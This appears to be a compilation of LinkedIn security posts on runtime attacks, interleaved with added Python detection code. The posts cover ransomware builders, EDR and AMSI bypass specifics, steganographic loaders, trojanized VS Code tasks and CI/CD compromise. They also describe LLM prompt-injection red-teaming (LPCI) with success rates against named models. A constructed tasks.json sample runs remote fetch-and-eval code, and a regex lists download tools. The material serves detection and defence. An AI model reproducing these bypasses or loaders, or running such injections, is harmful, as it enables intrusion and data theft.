Advanced Runtime Attack Techniques


Summary

Advanced runtime attack techniques refer to sophisticated methods used by cyber attackers to exploit systems while they are running, often bypassing traditional security measures by hiding malicious code in memory or abusing legitimate system processes. These techniques are increasingly used to evade detection and enable persistent, stealthy attacks that can compromise sensitive data or system integrity.

  • Monitor process behavior: Watch for unusual actions like unexpected memory manipulation or process injection, which can indicate attackers hiding malicious code in legitimate programs.
  • Strengthen threat detection: Combine API telemetry with memory analytics to spot abnormal activities that traditional monitoring may miss, such as encrypted in-memory payloads or stealthy loader execution.
  • Scrutinize fileless activity: Pay attention to fileless threats and steganography, where attackers hide malware in images or execute code directly from memory to evade forensic detection.
Summarized by AI based on LinkedIn member posts
  • Joas A Santos

    Founder @RedTeamLeaders | Head of AI Research | Author of 18 Books | Speaker | University Lecturer | Artificial Intelligence Research | Offensive Security

    143,405 followers

    Analyzing the leaked code from the Vanhelsing Ransomware, it is essentially a highly modular and automated builder, developed in C++, designed to dynamically generate executable binaries (.exe) based on instructions received from a C2 server. The core logic includes a persistent loop (wmain) that continuously polls for new tasks via REST HTTP requests to an attacker-controlled endpoint. When a task is received, the system automatically compiles two binaries: the locker, responsible for encrypting the victim's files, and the decrypter, which allows for data recovery if the correct key is provided. The main payload is encrypted using AES-256-GCM (via libsodium), with a key derived from an X25519 key pair. The compiled locker binary is read, encrypted, converted into a binary header, and embedded into the loader, which is the final stage responsible for decrypting and executing the locker at runtime. The modular architecture allows the same locker to be reused with multiple loaders. File operations are handled directly through low-level Win32 API calls (CreateFileA, ReadFile, MoveFileA, DeleteFileA), with no dependency on external libraries. PowerShell's Compress-Archive is also used to efficiently package and transmit artifacts via HTTP. There is a clear separation of responsibilities in the build pipeline: reading, encryption, macro substitution, architecture-specific compilation (Win32/x64), binary renaming, and upload to the C2 are all handled in well-defined stages, with error handling and diagnostics performed via GetLastError().

    Summary of Evasion Techniques:
    - Encryption of artifacts using X25519 + AES-256-GCM
    - Use of fileless-like execution via loader with embedded payload
    - Per-build uniqueness through dynamic key and ID insertion
    - Compilation via MSBuild (LOLBin abuse)

    #redteam #cybersecurity #malware #malwaredevelopment #malwareanalysis

  • Rock Lambros

    Securing Agentic AI @ Zenity | RockCyber | Cybersecurity | Board, CxO, Startup, PE & VC Advisor | CISO | CAIO | QTE | AIGP | Author | OWASP AI Exchange, GenAI & Agentic AI | Security Tinkerer | Tiki Tribe

    22,022 followers

    9 tries... That's all it took to break Gemini across all 6 attack stages. New research just dropped, and I'm proud to have had a small part in it. LAAF, the Logic-layer Automated Attack Framework, is the first automated red-teaming framework built for a vulnerability class that had no testing tool: Logic-layer Prompt Control Injection (LPCI). If you think this is about standard prompt injection, it's not. LPCI payloads persist in memory and vector stores. They survive session boundaries. They sit dormant until a trigger fires, a keyword, a tool call, or a turn count. Then they execute in sessions you thought were clean. The team built a 49-technique taxonomy across six attack categories:
    1. Encoding
    2. Structural manipulation
    3. Semantic reframing
    4. Layered combinations
    5. Trigger timing
    6. Exfiltration
    Combined with variants and lifecycle stages, that's a theoretical space of 2.8 million unique payloads. The core of LAAF is the Persistent Stage Breaker. When a payload breaks through one stage, it seeds the next stage with a mutated version of what worked, which is exactly how a real attacker escalates. We tested against five production LLM platforms. Gemini. Claude. LLaMA3. Mixtral. ChatGPT. Mean aggregate breakthrough rate across three independent runs: 84%. Gemini fell in 9 total attempts. Claude's document-access mode was broken in a single attempt through a compliance reframe. ChatGPT held at some stages and collapsed at others. Wake-up call... These were baseline defenses. Standard system prompts with no custom guardrails, no enterprise security stack, no layered filtering. So you might say to yourself, "Ok, so our protections will cover us." Now, remind yourself of your half-baked agent stack with persistent memory, RAG pipelines, and tool access bolted on with default permissions. The answer is probably worse than 84%. The framework is open source. The taxonomy is published. The winning techniques for each platform and stage are all documented.

    Huge credit to Hammad Atta - CISA-CISM for leading this research and the full team of co-authors, Ken Huang, Vineeth Sai Narajala, and the rest. 👉 Paper is attached. 👉 Follow and connect for more AI and cybersecurity insights with the occasional rant #AgenticAISecurity #LLMRedTeam #PromptInjection

    Keren Katz Chris Hughes Kayla Underkoffler Michael Bargury Ben Hanson Ben Kliger John Sotiropoulos Helen Oakley Eva Benn Evgeniy Kokuykin Allie Howe Laz . Idan Habler, PhD Tomer Elias Ariel Fogel Steve Wilson Rob van der Veer Aruneesh Salhotra Behnaz Karimi Dan Sorensen Peter Holcomb Douglas Brush Fred Wilmot Richard Bird Dutch Schwartz Mike May Jared Smith Karen Worstell, MA, MS Sabrina Caplis Ron F. Del Rosario Sandy Dunn Itzik Kotler Ron Bitton, PhD Jason Haddix Philip A. Dursey John V. Zenity

  • Chaitanyaa Bobhate

    Security Researcher | SDR - Threat Hunter | Digital Forensics | Bug Bounty Hunter

    6,919 followers

    🔍 Day 33/100 — Daily Intel

    🚨 New Indirect-Shellcode-Executor Tool Bypasses AV/EDR Using Windows API Quirk

    A new Rust-based offensive tool, Indirect-Shellcode-Executor, demonstrates a novel EDR bypass technique by abusing a little-known behavior in the Windows API.

    🧩 How the bypass works: The tool exploits the ReadProcessMemory function — normally used only for reading — by manipulating the lpNumberOfBytesRead pointer to write bytes into process memory.
    🔸 This creates a write primitive using a read API
    🔸 Completely sidesteps hooked functions like WriteProcessMemory, memcpy, etc.
    🔸 Avoids classic code-injection detection heuristics

    ⚙️ Key Capabilities (Rust PoC):
    🌐 Remote payload execution (C2-hosted shellcode, incl. hiding in PNG/asset files)
    💻 Terminal injection (pass raw shellcode via CLI)
    📁 File-based injection (payload stored in documents or temp files)

    📌 Why this matters: This technique lives below the radar of current EDR visibility. Most vendors hook write-oriented APIs — few monitor unexpected R/W mismatches in ReadProcessMemory. This expands the "living off the Windows API" attack surface for red teams and real adversaries.

    🛡️ Defensive Takeaways:
    º Monitor suspicious ReadProcessMemory calls targeting RWX or executable regions
    º Flag abnormal lpNumberOfBytesRead pointer usage
    º Combine API telemetry with memory behavior analytics rather than relying solely on API hooking

    https://lnkd.in/dnMftwqM #WindowsSecurity #EDRBypass #AVBypass #Shellcode #Rust #RedTeam #ThreatIntel #Malware #DFIR #DetectionEngineering #CyberSecurity #ExploitResearch #Day33of100 #100DaysOfIntel
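The defensive takeaways above are concrete enough to turn into detection logic. The reason the primitive works is that ReadProcessMemory stores the number of bytes transferred at *lpNumberOfBytesRead (even on a failed call that returns ERROR_PARTIAL_COPY), so a caller that points that argument at its own executable memory gets a SIZE_T-sized write, and a payload can be laid down a machine word at a time. The following is an added example, not code from the Indirect-Shellcode-Executor project or any EDR: it runs two heuristics over constructed API-telemetry records (the record fields and the per-process region map are hypothetical shapes, not a vendor schema) and flags calls whose count pointer lands in executable memory or advances through one region in sizeof(SIZE_T) strides.

```python
"""Flag ReadProcessMemory calls whose count pointer lands in executable memory.

The interesting argument is lpNumberOfBytesRead, not the source buffer that
write-oriented hooks watch. Telemetry record and region-map shapes below are
hypothetical and constructed for this example (not any vendor's schema).
"""
from __future__ import annotations
from dataclasses import dataclass

SIZE_T = 8  # assume a 64-bit process


@dataclass(frozen=True)
class Region:
    """One memory region of a process (constructed map, not a real VAD dump)."""
    base: int
    size: int
    protect: str  # e.g. "R", "RW", "RX", "RWX"

    def contains(self, addr: int) -> bool:
        return self.base <= addr < self.base + self.size


@dataclass(frozen=True)
class RpmCall:
    """One ReadProcessMemory call as API telemetry might record it."""
    pid: int             # calling process
    target_pid: int      # hProcess resolved to a PID
    base_address: int    # lpBaseAddress
    size: int            # nSize
    bytes_read_ptr: int  # lpNumberOfBytesRead
    success: bool        # FALSE (ERROR_PARTIAL_COPY) still stores the count


def region_for(addr: int, regions: list[Region]) -> Region | None:
    return next((r for r in regions if r.contains(addr)), None)


def _mark_run(run: list[int], min_run: int, reasons: dict[int, list[str]]) -> None:
    if len(run) >= min_run:
        for i in run:
            reasons.setdefault(i, []).append(
                f"count pointer in a stride-{SIZE_T} run of {len(run)} calls")


def suspicious_rpm_calls(calls: list[RpmCall],
                         regions_by_pid: dict[int, list[Region]],
                         min_run: int = 4) -> list[tuple[RpmCall, tuple[str, ...]]]:
    """Return (call, reasons) for calls matching either heuristic:
    1. lpNumberOfBytesRead points into executable memory of the caller;
    2. >= min_run calls whose count pointers advance by exactly SIZE_T through
       one region, i.e. something being written a word at a time."""
    reasons: dict[int, list[str]] = {}
    located = [(i, region_for(c.bytes_read_ptr, regions_by_pid.get(c.pid, [])))
               for i, c in enumerate(calls)]

    for i, reg in located:  # heuristic 1
        if reg is not None and "X" in reg.protect:
            reasons.setdefault(i, []).append(
                f"lpNumberOfBytesRead -> {reg.protect} region 0x{reg.base:x}")

    groups: dict[tuple[int, int], list[int]] = {}  # heuristic 2
    for i, reg in located:
        if reg is not None:
            groups.setdefault((calls[i].pid, reg.base), []).append(i)
    for idxs in groups.values():
        idxs.sort(key=lambda i: calls[i].bytes_read_ptr)
        run = [idxs[0]]
        for prev, cur in zip(idxs, idxs[1:]):
            if calls[cur].bytes_read_ptr - calls[prev].bytes_read_ptr == SIZE_T:
                run.append(cur)
                continue
            _mark_run(run, min_run, reasons)
            run = [cur]
        _mark_run(run, min_run, reasons)

    return [(calls[i], tuple(rs)) for i, rs in sorted(reasons.items())]


def constructed_telemetry() -> tuple[list[RpmCall], dict[int, list[Region]]]:
    """Constructed sample: a debugger-like reader (pid 7000) and a self-injector (pid 4242)."""
    regions_by_pid = {
        7000: [Region(0x7FF6A0000000, 0x20000, "RX"),   # image .text
               Region(0x0000A1000000, 0x10000, "RW")],  # stack/heap
        4242: [Region(0x7FF6B0000000, 0x20000, "RX"),
               Region(0x0000B2000000, 0x10000, "RW"),
               Region(0x000020000000, 0x1000, "RWX")],  # freshly allocated RWX buffer
    }
    # Benign: reads another process, count always goes to the same local variable.
    calls = [RpmCall(7000, 1000, 0x7FF700001000 + 0x100 * i, 0x100, 0xA1000FF8, True)
             for i in range(5)]
    # Suspicious: reads itself, partial copies, count pointer walks the RWX buffer.
    calls += [RpmCall(4242, 4242, 0x7FF6B001F000, 0x90 + i, 0x20000000 + SIZE_T * i, False)
              for i in range(6)]
    return calls, regions_by_pid


def flag_constructed() -> list[tuple[RpmCall, tuple[str, ...]]]:
    calls, regions_by_pid = constructed_telemetry()
    return suspicious_rpm_calls(calls, regions_by_pid)


if __name__ == "__main__":
    for call, why in flag_constructed():
        print(f"pid {call.pid} ptr 0x{call.bytes_read_ptr:x}: {'; '.join(why)}")
```

Both heuristics need a view of the caller's memory map at call time, which is why the post pairs API telemetry with memory analytics: an API hook alone sees a pointer value, not what protection the page behind it carries.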

  • Patrick Bareiß

    Principal Threat Research Engineer at Splunk

    5,438 followers

    Deep dive into EDR evasion techniques used by modern attackers - a comprehensive analysis by Mat Cyb3rF0x Fuchs covering everything from LOLBins to kernel-level bypasses.

    Five key evasion categories:
    • Living off the Land: Attackers abuse trusted system utilities (PowerShell, WMI, CertUtil) to blend malicious actions with legitimate operations
    • Process Injection: Hiding malicious code inside legitimate processes like explorer.exe through hollowing and thread injection
    • Hook Bypassing: Evading EDR visibility by unhooking APIs or using direct/indirect syscalls to circumvent monitoring
    • In-Memory Evasion: Running payloads entirely in memory with encryption and obfuscation to avoid detection during idle periods
    • EDR Tampering: Disabling security through "Bring Your Own Vulnerable Driver" (BYOVD) to gain kernel access and terminate protected processes

    Detailed threat actor examples and practical defensive mitigations included for security teams looking to harden their environments.

  • Flavio Queiroz, MSc, CISSP, CISM, CRISC, CCISO

    Cybersecurity Leader | Information Security | GRC | Security Operations | Mentor | GSOC, GCIH, GDSA, GISP, GPEN, GRTP, GCPN, GDAT, GCISP, GCTIA, CTIA, eCMAP, eCTHP, CTMP

    30,982 followers

    THREAT CAMPAIGN: MULTI-STAGE IN-MEMORY LOADER USING STEGANOGRAPHY AND PROCESS INJECTION

    ℹ️ Researchers have identified a sophisticated commodity malware loader actively used in targeted email campaigns by multiple advanced threat actors. These campaigns show precise regional and sector targeting, especially manufacturing and government organizations in 🇮🇹Italy, 🇫🇮Finland, and 🇸🇦Saudi Arabia.
    ℹ️ Despite different delivery methods (e.g., weaponized documents, SVGs, ZIP/LNK archives), all use a common loader architecture, suggesting a shared framework or ecosystem among attackers. Emails are crafted to resemble legitimate business communications, such as purchase orders, to trick recipients into executing malicious attachments.

    📍 MULTIPLE DELIVERY VECTORS
    The campaign uses a variety of file types and delivery mechanisms, including:
    ■ Weaponized Office documents exploiting vulnerabilities like CVE-2017-11882;
    ■ Malicious SVG files; and
    ■ Compressed archives with LNK shortcuts.
    All of these serve as triggers for the loader.

    📍 EVASION TECHNIQUES
    The loader employs several stealthy tactics:
    ■ Steganography, hiding payloads inside benign image files.
    ■ Trojanizing open-source libraries so they appear legitimate but contain hidden malicious behavior.
    ■ A four-stage evasion pipeline, including obfuscation, in-memory execution, and process injection to evade forensic detection.

    📍 LOADER
    The infection chain typically follows these phases:
    ■ 1. Initial Execution: Email attachment executes obfuscated script (e.g., JavaScript) that spawns PowerShell.
    ■ 2. Steganographic Payload Retrieval: Payload is pulled from a hosted image and decoded in memory (no disk artifacts).
    ■ 3. Trojanized Component Loading: A genuine open-source library (e.g., TaskScheduler) is embedded with malicious functions and loaded reflectively.
    ■ 4. Process Injection & Payload Execution: Malicious code is injected into a legitimate system process to avoid detection and the real malware (e.g., RAT or stealer) is executed.

    📍 PAYLOADS DELIVERED
    The loader can deliver a range of secondary malware, depending on the campaign, such as:
    ■ Remote Access Trojans (RATs) and
    ■ Infostealers like PureLog Stealer, Katz Stealer, DC Rat, AsyncRat, Remcos, etc.
    These payloads are designed to exfiltrate credentials, system information, or enable full remote compromise.

    📌 Source: Cyble
    🔗 https://lnkd.in/ddnwfYWk
    #threathunting #threatdetection #threatanalysis #threatintelligence #cyberthreatintelligence #cyberintelligence #cybersecurity #cyberprotection #cyberdefense
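"Hiding payloads inside benign image files" covers several techniques, and the one a forensic analyst can check for cheaply is the simplest: data appended after the image's structural end, which viewers ignore and a loader reads back by offset. The following is an added example, not code from the Cyble report or the post above. It walks a PNG's chunk list to find where IEND really ends and reports any bytes after it, and, as a generalization of the same idea, does the equivalent for ZIP containers (readers locate the End of Central Directory record and never look past it). The sample files are constructed in code; it does not detect payloads encoded into pixel values (LSB steganography), which needs image-level analysis.

```python
"""Report bytes appended after the structural end of a PNG or ZIP file.

Added example. Sample files are constructed below; the appended "payload" is a
harmless placeholder string.
"""
import io
import struct
import zipfile
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
EOCD_SIG = b"PK\x05\x06"


def png_trailing_bytes(data: bytes) -> int:
    """Bytes after the IEND chunk. Walks the chunk list rather than searching
    for the IEND marker, so an 'IEND' string inside a payload cannot fool it."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    off = len(PNG_SIG)
    while True:
        if off + 8 > len(data):
            raise ValueError("truncated chunk header")
        length, ctype = struct.unpack(">I4s", data[off:off + 8])
        end = off + 12 + length  # 4 length + 4 type + data + 4 CRC
        if end > len(data):
            raise ValueError(f"truncated {ctype!r} chunk")
        if ctype == b"IEND":
            return len(data) - end
        off = end


def zip_trailing_bytes(data: bytes) -> int:
    """Bytes after the EOCD record and its comment. Uses the last EOCD
    signature in the file, as archivers do; a payload containing those same
    four bytes would shift the result."""
    eocd = data.rfind(EOCD_SIG)
    if eocd < 0 or eocd + 22 > len(data):
        raise ValueError("no EOCD record")
    (comment_len,) = struct.unpack("<H", data[eocd + 20:eocd + 22])
    return len(data) - (eocd + 22 + comment_len)


def trailing_bytes(data: bytes) -> tuple[str, int]:
    """Sniff the container type and return (kind, trailing byte count)."""
    if data.startswith(PNG_SIG):
        return "png", png_trailing_bytes(data)
    if data.startswith(b"PK\x03\x04"):
        return "zip", zip_trailing_bytes(data)
    raise ValueError("unsupported container")


# --- constructed samples ---------------------------------------------------

def _chunk(ctype: bytes, payload: bytes) -> bytes:
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def make_png_1x1() -> bytes:
    """Smallest valid PNG: 1x1, 8-bit grayscale."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")  # filter byte + one pixel
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


def make_zip() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("AppxManifest.xml", "<Package/>")  # looks like an app bundle
    return buf.getvalue()


# Stand-in for an appended script; not real malware.
FAKE_TAIL = b"<html><script language='VBScript'>' constructed placeholder</script></html>"

if __name__ == "__main__":
    for name, blob in [("clean.png", make_png_1x1()), ("stego.png", make_png_1x1() + FAKE_TAIL),
                       ("clean.zip", make_zip()), ("polyglot.zip", make_zip() + FAKE_TAIL)]:
        kind, n = trailing_bytes(blob)
        print(f"{name}: {kind}, {n} trailing bytes{'  <-- inspect' if n else ''}")
```

A non-zero result is a lead, not a verdict: some legitimate tooling writes metadata after IEND, so the next step is to carve the tail and look at what it contains.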

  • Tim Peck

    Director of Threat Research @ detections.ai

    7,944 followers

    Fake Claude Code installers are dropping RedLine stealer. Google Ads (malvertising) is the delivery mechanism. Trend Micro researchers published details on an InstallFix campaign targeting users searching for Anthropic's Claude AI. Attackers purchased Google Ads placements for terms like "Claude Code install," leading victims to fake landing pages with OS-specific installation commands.

    Typical ClickFix/InstallFix workflow:
    - Copy the command
    - paste it into your terminal
    - system executes mshta.exe against a remote ZIP/HTA polyglot payload.
    - mshta fetches a file disguised as an MSIX bundle (actually a ZIP with HTA appended at byte offset 882290)
    - VBScript executes via COM Shell.Application with the window resized to 0x0
    - cmd.exe reconstructs "powershell" from split variables to evade static detection, and a base64-encoded stager runs with AMSI already blinded.

    The AMSI bypass is one of many detection opportunities you can take advantage of here, provided you have endpoint logging telemetry. The stager RC4-decrypts bypass strings using the key "BWJFEesMEqRvjQbm," then writes "0x41414141" to amsiContext via "[Runtime.InteropServices.Marshal]::WriteInt32". That specific combination of "WriteInt32" and "0x41414141" in a PowerShell script block is a strong signal as legitimate code should typically not write "AAAA" to AMSI's context buffer. Link to rule at detections.ai: https://lnkd.in/gQFke6rD

    The C2 uses victim-unique subdomains derived from MD5(COMPUTERNAME+USERNAME), meaning each infected host contacts a different URL. Bulk network blocking becomes harder, but the AMSI bypass pattern stays consistent across all victims.

    Research by Trend Micro: https://lnkd.in/gZ8yCviH
    Additional rules and threat intel details at detections.ai: https://lnkd.in/gYQzWZSd
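Two of the observations above translate directly into hunting logic: the WriteInt32 / 0x41414141 pairing in PowerShell script block logs, and the per-victim subdomain, which stops being an obstacle once you can predict the label for each host you manage. The following is an added example, not the detections.ai rule or Trend Micro's code. The 4104 events and DNS queries are constructed. One point worth knowing before relying on it: script block logging records the block that actually executes, so a stager that RC4-decrypts its strings and then invokes them still surfaces the decrypted text in a later 4104 event. The C2-label function is a reconstruction from the post's description, and its concatenation order, casing and encoding are assumptions that must be confirmed against a real sample.

```python
"""Hunt script block logs for the AMSI context patch and pivot host inventory
to per-victim C2 labels. Added example; sample events and DNS names are constructed."""
import hashlib
import re

# WriteInt32 followed within a short window by 0x41414141, written as a hex
# literal or as its decimal value (1094795585). Legitimate code has little
# reason to write "AAAA" through Marshal into anything.
AMSI_CONTEXT_PATCH = re.compile(
    r"Marshal\]::WriteInt32\b.{0,200}?(?:0x0*41414141\b|\b1094795585\b)",
    re.IGNORECASE | re.DOTALL,
)


def find_amsi_context_patch(events: list[dict]) -> list[int]:
    """Return RecordIds of Event ID 4104 records whose ScriptBlockText matches."""
    return [e["RecordId"] for e in events
            if e.get("EventID") == 4104
            and AMSI_CONTEXT_PATCH.search(e.get("ScriptBlockText", ""))]


def predict_c2_label(computername: str, username: str) -> str:
    """Hypothetical reconstruction of the victim-unique subdomain label.

    The post states MD5(COMPUTERNAME+USERNAME). Concatenation order, case
    handling and encoding (UTF-8, no separator) are assumptions made here;
    verify against a real sample before hunting with it."""
    return hashlib.md5((computername + username).encode("utf-8")).hexdigest()


def match_dns_to_hosts(queries: list[str],
                       hosts: list[tuple[str, str]]) -> list[tuple[str, str, str]]:
    """(computername, username, query) for DNS queries whose leftmost label
    equals a predicted per-host label. Hosts come from your inventory."""
    expected = {predict_c2_label(c, u): (c, u) for c, u in hosts}
    hits = []
    for q in queries:
        label = q.lower().split(".", 1)[0]
        if label in expected:
            c, u = expected[label]
            hits.append((c, u, q))
    return hits


# --- constructed samples ---------------------------------------------------

SAMPLE_EVENTS = [
    {"RecordId": 1, "EventID": 4104,  # benign Marshal use: writes 0, not AAAA
     "ScriptBlockText": "$buf=[Runtime.InteropServices.Marshal]::AllocHGlobal(4);"
                        "[Runtime.InteropServices.Marshal]::WriteInt32($buf, 0); Get-Process"},
    {"RecordId": 2, "EventID": 4104,  # hex form
     "ScriptBlockText": "$ac = $ctx;  # pointer resolved earlier in the stager\n"
                        "[Runtime.InteropServices.Marshal]::WriteInt32($ac, 0x41414141)"},
    {"RecordId": 3, "EventID": 4104,  # decimal form, fully qualified type name
     "ScriptBlockText": "[System.Runtime.InteropServices.Marshal]::WriteInt32($amsiContext, 1094795585)"},
    {"RecordId": 4, "EventID": 4103,  # wrong event type: module logging, not a script block
     "ScriptBlockText": "WriteInt32 0x41414141"},
]

SAMPLE_HOSTS = [("WS01", "alice"), ("WS02", "bob")]
SAMPLE_DNS = [
    "www.example.invalid",
    predict_c2_label("WS01", "alice") + ".cdn.example.invalid",  # constructed beacon
]

if __name__ == "__main__":
    print("AMSI patch in records:", find_amsi_context_patch(SAMPLE_EVENTS))
    for host, user, query in match_dns_to_hosts(SAMPLE_DNS, SAMPLE_HOSTS):
        print(f"{host}\\{user} resolved predicted C2 label: {query}")
```

The script block rule is the reliable half; the DNS pivot only pays off once the hash recipe is confirmed, but when it is, a single query across DNS logs tells you which hosts in the fleet have beaconed.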

  • Lenin Alevski

    Security Engineer at Google | #RSAC #DEFCON #BSIDES Speaker | Blogger

    4,286 followers

    Fake "coding interview" projects are now a full-on persistence play against Next.js developers. Microsoft Defender Experts just documented a campaign where North Korea-linked operators deliver Trojanized Next.js repos as take-home interview tasks and "assessment projects". Open the repo in Visual Studio Code, trust the workspace, run the dev server, and the attacker gets remote code execution plus a staged command-and-control channel. The mechanics are very developer-workflow aware. Some repos ship a .vscode/tasks.json that auto-runs when the workspace is trusted, chaining Node.js into a fetch-and-execute loader that pulls attacker JavaScript at runtime. Others hide obfuscated logic directly in app code so that `next dev` or a standard build command silently decodes and retrieves the next payload. In both paths, the result is in-memory JS that establishes long-lived C2, data exfiltration, and the ability to push arbitrary follow-on tooling. This is not about an npm typo or a random GitHub repo any more. It is your interview homework, your "sample project", your normal IDE prompts asking whether you trust this folder. The attack surface is whatever developers are socially conditioned to treat as routine.
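The tasks.json auto-run hook is a specific, checkable thing: a task whose `runOptions.runOn` is `"folderOpen"` starts as soon as the workspace is trusted. The following is an added example, not code from the Microsoft Defender Experts write-up; it lists such tasks from a repo's `.vscode/tasks.json` before anyone opens the folder, and marks the ones whose command looks like it reaches out to the network. The sample file is constructed (the `cdn.example.invalid` host is a placeholder), and the remote-fetch keyword list is a heuristic rather than a complete signature.

```python
"""List VS Code tasks that run automatically once a workspace is trusted.

Added example. Sample tasks.json is constructed; FETCH_HINTS is a heuristic.
"""
import json
import re

FETCH_HINTS = re.compile(
    r"(curl\b|wget\b|Invoke-WebRequest|\biwr\b|fetch\(|http\.get|https?://|Invoke-Expression|\beval\()",
    re.IGNORECASE,
)


def strip_jsonc_comments(text: str) -> str:
    """VS Code accepts comments in tasks.json; json.loads does not. Removes
    /* */ blocks and whole-line // comments only, so a "https://" inside a
    string value survives."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.DOTALL)
    return re.sub(r"^\s*//.*$", "", text, flags=re.MULTILINE)


def auto_run_tasks(tasks_json_text: str) -> list[dict]:
    """Tasks with runOptions.runOn == "folderOpen", with their effective
    command text and a flag for network-fetch patterns in it."""
    doc = json.loads(strip_jsonc_comments(tasks_json_text))
    findings = []
    for task in doc.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        parts = [str(task.get("command", ""))] + [str(a) for a in task.get("args", [])]
        for os_key in ("windows", "linux", "osx"):  # per-OS overrides also carry commands
            parts.append(str((task.get(os_key) or {}).get("command", "")))
        cmd = " ".join(p for p in parts if p)
        findings.append({
            "label": task.get("label", "<unnamed>"),
            "type": task.get("type"),
            "command": cmd,
            "fetches_remote": bool(FETCH_HINTS.search(cmd)),
        })
    return findings


SAMPLE_TASKS_JSON = r'''{
  // constructed sample; cdn.example.invalid is a placeholder, not a real host
  "version": "2.0.0",
  "tasks": [
    {
      "label": "dev",
      "type": "npm",
      "script": "dev"
    },
    {
      "label": "Prepare workspace",
      "type": "shell",
      "command": "node",
      "args": ["-e", "fetch('https://cdn.example.invalid/setup.js').then(r=>r.text()).then(eval)"],
      "presentation": { "reveal": "never" },
      "runOptions": { "runOn": "folderOpen" }
    }
  ]
}'''

if __name__ == "__main__":
    for f in auto_run_tasks(SAMPLE_TASKS_JSON):
        flag = "  <-- fetches remote code" if f["fetches_remote"] else ""
        print(f"[{f['type']}] {f['label']}: {f['command']}{flag}")
```

Running this against a take-home repo before trusting it in the IDE costs a few seconds; `"presentation": {"reveal": "never"}` next to a folderOpen task, as in the constructed sample, is the kind of detail that should make you read the command twice.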

  • Greg Crowley, CISSP

    CISO | AI Enablement | Governance, Security & Risk Management | Board-Facing Cybersecurity Executive | Author

    3,211 followers

    Attackers are treating CI/CD like Tier-0 infrastructure...one of the most privileged environments in the enterprise. The recent TeamPCP GitHub Actions attack is a good example of where things are going. This wasn't just a compromised repo. It was a clean, repeatable playbook:
    ➡️ Compromise a GitHub Action
    ➡️ Retag it to point to malicious code
    ➡️ Let it run inside trusted pipelines
    ➡️ Steal secrets and tokens
    ➡️ Move laterally
    That's the attack. If your pipeline runs it, your company trusts it. And that's exactly what was exploited.

    What actually broke here wasn't one control. It was a set of assumptions:
    1️⃣ People are still trusting tags instead of immutable references
    2️⃣ CI tokens have way too much privilege
    3️⃣ Secrets are long-lived and broadly accessible
    4️⃣ There is little to no visibility into what CI jobs actually do at runtime
    This didn't get caught by static controls. It showed up when someone looked at runtime behavior.

    What needs to change:
    🛡️ First, stop trusting the supply chain by default
    - Pin actions to SHAs, not tags
    - Allowlist what can run in your pipelines
    🛡️ Second, fix identity
    - Move to OIDC and short-lived credentials
    - Reduce permissions at the workflow level
    - Assume anything running in CI could be compromised
    🛡️ Third, treat CI like a hostile environment
    - Use ephemeral runners
    - Lock down outbound network access
    - Do not expose secrets to untrusted jobs
    🛡️ Fourth, add runtime visibility
    - Monitor process execution and network activity
    - Alert on anything that looks like exfiltration

    This is not just a DevSecOps problem anymore. This is identity, supply chain, and runtime security all meeting in one place. And attackers are already there. Your CI/CD pipeline is not just a build system. It is a high-trust execution layer so it is time to start treating it that way.

    #CyberSecurity #CISO #DevSecOps #CloudSecurity #SupplyChainSecurity https://lnkd.in/e5SWmzSh
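The first two broken assumptions above (mutable tags, over-privileged tokens) are the ones a repository owner can audit from the workflow file alone. The following is an added example, not code from any report on the incident: it scans a workflow for `uses:` references that are not pinned to a full 40-hex commit SHA and for the absence of a workflow-level `permissions:` block (without one, the job's GITHUB_TOKEN gets the repository default). Both sample workflows are constructed, and the SHAs in the hardened one are placeholders, not real commits; a retagged `v4` is exactly what the attack relies on, while a commit SHA cannot be moved.

```python
"""Audit a GitHub Actions workflow for unpinned actions and a missing
top-level permissions block. Added example; sample workflows are constructed
and their 40-hex SHAs are placeholders."""
import re

# "- uses: owner/repo@ref" with optional quotes; ref stops at whitespace or '#'.
USES_RE = re.compile(r"^\s*-?\s*uses:\s*['\"]?([^\s'\"@]+)@([^\s'\"#]+)")
FULL_SHA_RE = re.compile(r"^[0-9a-f]{40}$")


def unpinned_actions(workflow_text: str) -> list[tuple[int, str, str]]:
    """(line number, action, ref) for every `uses:` not pinned to a 40-hex SHA.
    Local actions (./path) never carry an @ref, and docker:// images are a
    separate trust decision, so both are left alone here."""
    findings = []
    for lineno, line in enumerate(workflow_text.splitlines(), 1):
        m = USES_RE.match(line)
        if not m:
            continue
        action, ref = m.groups()
        if action.startswith("docker://"):
            continue
        if not FULL_SHA_RE.match(ref):
            findings.append((lineno, action, ref))
    return findings


def declares_permissions(workflow_text: str) -> bool:
    """True when an unindented `permissions:` key exists. GitHub also honours
    job-level blocks; this check is about the workflow-wide default."""
    return any(line.startswith("permissions:") for line in workflow_text.splitlines())


def review(workflow_text: str) -> list[str]:
    msgs = [f"line {n}: {a}@{r} is a mutable reference; pin to a commit SHA"
            for n, a, r in unpinned_actions(workflow_text)]
    if not declares_permissions(workflow_text):
        msgs.append("no top-level permissions: block; GITHUB_TOKEN gets the repository default")
    return msgs


WEAK_WORKFLOW = """name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: some-org/setup-tool@main
      - uses: ./.github/actions/local-step
      - run: npm ci && npm test
"""

HARDENED_WORKFLOW = """name: ci
on: [push]
permissions:
  contents: read
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      # placeholder SHAs for the example; pin to the real commit you audited
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567 # v4.x
      - uses: some-org/setup-tool@89abcdef0123456789abcdef0123456789abcdef # v1.2.3
      - uses: ./.github/actions/local-step
      - run: npm ci && npm test
"""

if __name__ == "__main__":
    for name, text in [("weak", WEAK_WORKFLOW), ("hardened", HARDENED_WORKFLOW)]:
        print(f"{name}: " + ("; ".join(review(text)) or "no findings"))
```

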